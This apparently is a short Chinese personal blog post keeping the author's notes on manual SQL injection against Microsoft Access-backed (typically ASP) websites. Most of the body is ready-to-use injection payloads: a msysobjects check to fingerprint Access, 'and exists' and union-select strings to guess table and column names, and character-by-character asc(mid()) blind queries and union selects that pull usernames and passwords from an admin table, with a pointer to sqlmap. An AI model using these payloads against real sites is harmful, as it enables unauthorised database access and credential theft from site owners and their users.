TypechoJoeTheme

mmzkyl

Access数据库手工注入

mmzkyl博主
2021-10-22
/
0 评论
/
182 阅读
/
173 个字
/
百度已收录
10/22
本文最后更新于2021年10月22日,已超过213天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

随笔

  • 计网的第一节实验课,安装实验环境wireshark太无聊了
  • 记录一下Access的简单手工注入,不然每次我要用到的时候都要去查
  • 这个只是用来自己平常查看,所以写的比较随意
  • 不过Access并不适合于手工注入,确定注入点后就交给sqlmap吧
  • 终于快下课了
  • 2021-10-22 10:19
    更新一下Access手工注入,以前写的不够完整

正文

  • Access数据库直接爆表名即可
  • Access数据库一般与asp相搭配
  • Access数据库的判断语句
    sql and (select * from msysobjects)>0 #一般返回权限不足,便能确定其为Access,如下图所示
  • Access数据库爆破表名

    and exists (select * from xxx)
    and exists (select * from admin)
    
    union select 1,2,3,4,5,6 from xxx
    union select 1,2,3,4,5,6 from admin
    
  • Access爆破列名

    and exists (select xxx from admin)
    and exists (select id from admin)
    
    union select 1,2,3,4,5,6 from admin
    union select 1,id,3,4,5,6 from admin
    
  • Access获取数据

    and (select top 1 asc(mid(admin,1,1)) from admin) = 97
    and (select top 1 asc(mid(admin,2,1)) from admin) = 100
    and (select top 1 asc(mid(admin,3,1)) from admin) = 109
    and (select top 1 asc(mid(admin,4,1)) from admin) = 105
    and (select top 1 asc(mid(admin,5,1)) from admin) = 110
    
    union select 1,id,3,4,5,6 from admin
    union select 1,username,3,4,5,6 from admin
    union select 1,password,3,4,5,6 from admin
    
赞(7)
评论 (0)

互动读者

  • moxfmgef闲逛

    评论 1 次 | 文章 0 篇

  • เว็บแท่งหวยออนไลน์闲逛

    评论 1 次 | 文章 0 篇

  • slot terbaru闲逛

    评论 1 次 | 文章 0 篇

  • mobil odeme bozum闲逛

    评论 1 次 | 文章 0 篇

标签云